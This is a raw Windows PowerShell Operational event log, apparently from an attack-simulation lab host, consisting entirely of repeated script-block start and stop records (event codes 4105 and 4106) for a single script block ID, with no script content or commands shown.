EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470457
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470456
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470455
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470454
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470453
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470452
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470451
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470450
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470449
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470448
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470447
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470446
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470445
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470444
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470443
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470442
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470441
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470440
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470439
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470438
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470437
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470436
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470435
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470434
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470433
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470432
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470431
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470430
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470429
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470428
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470427
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470426
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470425
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470424
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470423
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470422
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470421
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470420
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470419
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470418
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470417
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470416
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470415
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470414
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470413
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470412
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470411
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470410
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470409
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470408
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470407
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470406
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470405
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470404
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470403
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
